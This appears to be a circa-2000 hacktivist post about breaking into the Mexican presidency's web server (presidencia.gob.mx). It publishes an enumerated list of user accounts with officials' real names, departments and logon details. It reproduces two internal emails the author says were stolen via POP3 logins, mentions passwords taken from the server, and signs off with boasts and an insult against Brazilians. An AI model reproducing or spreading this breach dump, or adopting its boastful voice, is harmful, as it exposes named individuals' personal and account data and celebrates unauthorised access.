The Administrator account is an ADMINISTRATOR, and the password was changed 0 days ago. This account has been used 847 times to logon.The default Administrator account has not been renamed. Consider renaming this account and removing most of its rights. Use a differnet account as the admin account.

Comment :Built-in account for administering the computer/domainUser Comment :Full name :


The afernand account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon.

Comment :PoliticaUser Comment :Full name :Alejandra Fernandez Wong


The afrias account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :DGCS - PublicacionesUser Comment :Full name :Alfonso Manuel Frias Badillo


The agomez account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :Consejeria JuridicaUser Comment :Full name :Alfredo Gomez Aguirre


The agomezg account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :DGCS - Analisis y EvaluacionUser Comment :Full name :Andres Gomez Glokner


The agonzale account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :CAC - DGPAUser Comment :Full name :Angel Gonzalez Amozorrutia

Account Name :WWW$

The caltamir account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon.

Comment :User Comment :

Full name :

Un mail que por ahí me he hurtado solo para saber cómo van las cosas :-)

****************************************************************************

+OK Microsoft Exchange POP3 server version 5.5.2650.23 ready+OK+OK User successfully logged on

Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id VCFMTPYN; Tue, 17 Oct 2000 07:58:59 +0100Message-ID: <[email protected]> Date: Tue, 17 Oct 2000 07:59:48 -0500From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <[email protected]>X-Mailer: Mozilla 4.5 [es] (Win98; I)X-Accept-Language: esMIME-Version: 1.0To: [email protected]: Cambio de Servidor de CorreoContent-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: 8bit

Debido a que fue necesario cambiar el servidor de correo por uno de más capacidad, es posible que en este cambio se hayan perdido algunos correos, tanto al recibir como al enviar. Por lo cual le sugerimos reenviar o solicitar aquellos correos que Ud. considere importantes. Así mismo se les informa que durante el día de hoy puede haber problemas en la recepción de correos debido a que los cambios realizados tardan aproximadamente 24 horas en ser difundidos en internet.

Por su comprensión gracias..

*****************************************************************************

+OK Microsoft Exchange POP3 server version 5.5.2650.23 ready+OK+OK User successfully logged on

Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id VYCDD7WK; Tue, 14 Nov 2000 22:33:04 -0000Message-ID: <[email protected]>Date: Tue, 14 Nov 2000 22:33:43 -0500From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <[email protected]>X-Mailer: Mozilla 4.5 [es] (Win98; I)X-Accept-Language: esMIME-Version: 1.0To: [email protected]: Nuevo VirusContent-Type: multipart/alternative;boundary="------------68EDA2B8A569812A6DD1AA9A"

--------------68EDA2B8A569812A6DD1AA9AContent-Type: text/plain; charset=us-asciiContent-Transfer-Encoding: 7bit

???? CUIDADO !!!!

NO ABRAN EL MAIL CON EL ARCHIVO ADJUNTO "NAVIDAD.EXE ",NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LACOMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DEDIRECCIONES.

.

--------------68EDA2B8A569812A6DD1AA9AContent-Type: text/html; charset=us-asciiContent-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en"><html><font color="#FF0000">???? CUIDADO !!!!</font><p><font color="#CC0000">NO ABRAN EL MAIL</font> CON EL ARCHIVO ADJUNTO<font color="#FF0000">"NAVIDAD.EXE "</font>,<br>NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA.COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DEDIRECCIONES.</html>

--------------68EDA2B8A569812A6DD1AA9A--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=NOTA: ESTE ARTICULO FUE ENVIADO A LA GENTE RESPONSABLE DE WWW.PRESIDENCIA.GOB.MX

ANTES DE SER PUBLICADO, ESTO ES POR SI NO CONOCEN AUN TODAS LAS FALLAS, HE ENVIADO UN ESCRITO MUY BREVE Y PASSWORDS ENCONTRADOS EN SU SERVIDOR, ASI KE YO ESPERO KE CORRIJAN LA FALLAS AKI EXPUESTAS, AUN NO HE RECIBIDO RESPUESTA ASI KE ESTE TEXTO LO PUBLICARE JUNTO CON MAILS KE HE OBTENIDO, POR ULTIMO AGREGO ESTA LINEA...

"FUCK ASSHOLE BRAZILIAN"

ATTE: alt3kx!Greet to: dr_fdisk^ _0x90_ x-ploitHacktivism! rUL3Z!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Hackeando Www.presidencia.gob.Mx

Documents

Transcript of Hackeando Www.presidencia.gob.Mx